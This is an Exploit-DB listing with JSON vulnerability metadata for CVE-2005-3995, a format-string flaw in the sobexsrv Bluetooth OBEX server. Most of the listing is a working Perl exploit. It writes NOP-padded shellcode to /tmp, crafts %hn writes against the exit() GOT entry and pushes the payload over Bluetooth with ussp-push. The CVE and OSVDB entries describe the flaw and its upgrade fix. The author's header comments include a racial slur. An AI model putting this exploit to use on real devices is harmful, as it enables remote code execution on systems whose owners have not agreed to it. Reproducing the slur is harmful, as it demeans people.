ID EDB-ID:1355
Type exploitdb
Reporter Kevin Finisterre
Modified 2005-12-03T00:00:00
Description
sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit. CVE-2005-3995. Remote exploit for the Linux platform.
#!/usr/bin/perl
#
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch!
#
# Proof-of-concept for CVE-2005-3995: sobexsrv before 1.0.0-pre4 passed
# attacker-controlled OBEX file-name data to syslog() as a format string when
# run with -S. Mitigation is to upgrade to 1.0.0-pre4 or later (or not run
# with -S); see the advisory text that accompanies this listing.
#
# The script is a flat sequence of statements with no `use strict`/`use
# warnings`; every variable below is a package global.
#
# Fixed address used as the write target. It is tied to one specific build
# of the target binary and is not derived at runtime, so the script has no
# portability across builds or distributions.
$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents.
# R_386_JUMP_SLOT exit()
# Two adjacent little-endian 32-bit addresses placed at the start of the
# payload; the comment above identifies them as the exit() GOT slot.
$addy = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";
# Split $retloc into its low and high 16-bit halves.
$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;
# Both halves are corrected by the target-specific constant 0x38; its
# derivation is not shown in this file. The 0x10000 term keeps $lo
# non-negative after subtracting $hi.
$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;
#print "hi: $hi\n";
#print "lo: $lo\n";
# The complete shell command as one string: a hard-coded Bluetooth address
# (`\@` stops Perl from interpolating an array), the fixed payload path, the
# two addresses, the two width-controlled `%d`/`%hn` conversions and 200
# bytes of 0x41 padding. `\\\$` yields a literal `\$` in the Perl string; the
# shell invoked by system() below strips that backslash.
# NOTE(review): system() is given a single string, so the command is run via
# the shell. Everything interpolated here is a constant from this file, not
# external input, but the list form of system() would avoid the shell.
$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";
# File contents sent as the OBEX object: 31 NOP bytes followed by a payload
# the original comment attributes to the Metasploit /usr/bin/id shellcode.
$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";
# Two-argument open() on a bareword filehandle, writing to a fixed path in
# the shared /tmp directory (overwritten without any check). Modern Perl
# would use the three-argument form with a lexical handle; the close() below
# is unchecked, so a short write would go unnoticed.
open(F, "> /tmp/shellcode") or die "can't open file";
# A trailing newline is appended to the payload file.
print F "$sc\n";
close(F);
# Runs ussp-push through the shell (see the note on $string above); the
# return status is not examined.
system($string);
# milw0rm.com [2005-12-03]
{"id": "EDB-ID:1355", "type": "exploitdb", "bulletinFamily": "exploit", "title": "sobexsrv 1.0.0_pre3 Bluetooth syslog Remote Format String Exploit", "description": "sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit. CVE-2005-3995. Remote exploit for linux platform", "published": "2005-12-03T00:00:00", "modified": "2005-12-03T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1355/", "reporter": "Kevin Finisterre", "references": [], "cvelist": ["CVE-2005-3995"], "lastseen": "2016-01-31T14:03:33", "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T14:03:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3995"]}, {"type": "osvdb", "idList": ["OSVDB:21567"]}], "modified": "2016-01-31T14:03:33", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/1355/", "sourceData": "#!/usr/bin/perl\n# \n# trifinite.group Bluetooth sobexsrv remote syslog() exploit\n# code by kf_lists[at]digitalmunition[dot]com\n#\n# http://www.digitalmunition.com\n#\n# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!\n# Big ups to d4yj4y beeeeeeeeeeeeeotch! \n#\n$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. \n\n# R_386_JUMP_SLOT exit()\n$addy = \"\\x5a\\x19\\x05\\x08\";\n$addy2 = \"\\x58\\x19\\x05\\x08\";\n\n$lo = ($retloc >> 0) & 0xffff;\n$hi = ($retloc >> 16) & 0xffff;\n\n$hi = $hi - 0x38;\n$lo = (0x10000 + $lo) - $hi - 0x38;\n\n#print \"hi: $hi\\n\";\n#print \"lo: $lo\\n\";\n\n$string = \"./ussp-push 00:0B:0D:63:0B:CC\\@1 /tmp/shellcode \" . \"$addy$addy2%$hi.d%27\\\\\\$hn%$lo.d%28\\\\\\$hn\" . \"\\x41\" x 200;\n#print $string . \"\\n\";\n\n$sc = \"\\x90\" x 31 . 
# Metasploit /usr/bin/id shellcode \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4c\\x46\\x4b\\x50\\x4a\\x35\".\n\"\\x49\\x39\\x44\\x55\\x48\\x46\\x4a\\x46\\x4d\\x52\\x43\\x36\\x49\\x58\\x47\\x4e\".\n\"\\x4a\\x56\\x4f\\x52\\x43\\x57\\x4a\\x46\\x42\\x50\\x4a\\x56\\x4f\\x32\\x44\\x56\".\n\"\\x49\\x46\\x50\\x56\\x49\\x58\\x43\\x4e\\x44\\x45\\x4a\\x4e\\x4e\\x30\\x42\\x30\".\n\"\\x42\\x30\\x42\\x50\\x4f\\x32\\x45\\x47\\x43\\x57\\x44\\x47\\x4f\\x32\\x44\\x56\".\n\"\\x49\\x36\\x50\\x46\\x4f\\x52\\x49\\x56\\x46\\x36\\x42\\x50\\x47\\x45\\x43\\x35\".\n\"\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x38\\x5a\";\n\nopen(F, \"> /tmp/shellcode\") or die \"can't open file\";\nprint F \"$sc\\n\";\nclose(F);\n\nsystem($string);\n\n# milw0rm.com [2005-12-03]\n", "osvdbidlist": ["21567"]}
{"cve": [{"lastseen": "2020-12-09T19:22:22", "description": "Format string vulnerability in the dosyslog function in the OBEX server (obexsrv.c) for Sobexsrv before 1.0.0-pre4, when the syslog (-S) function is enabled, allows remote attackers to execute arbitrary code via format string specifiers in file name arguments to OBEX commands.", "edition": 5, "cvss3": {}, "published": "2005-12-05T00:03:00", "title": "CVE-2005-3995", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3995"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/a:sobexsrv:sobexsrv:1.0.0_pre3"], "id": "CVE-2005-3995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3995", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sobexsrv:sobexsrv:1.0.0_pre3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3995"], "edition": 1, "description": "## Solution Description\nUpgrade to version 1.0.0.pre4 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.mulliner.org/bluetooth/sobexsrv.php\nOther Advisory URL: http://www.securiteam.com/unixfocus/6B0012AEVK.html\nOther Advisory URL: http://www.digitalmunition.com/DMA[2005-1202a].txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0121.html\nFrSIRT Advisory: ADV-2005-2711\n[CVE-2005-3995](https://vulners.com/cve/CVE-2005-3995)\nBugtraq ID: 15692\n", "modified": "2005-12-02T00:20:30", "published": "2005-12-02T00:20:30", "href": "https://vulners.com/osvdb/OSVDB:21567", "id": "OSVDB:21567", "title": "sobexsrv -S Parameter Format String Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}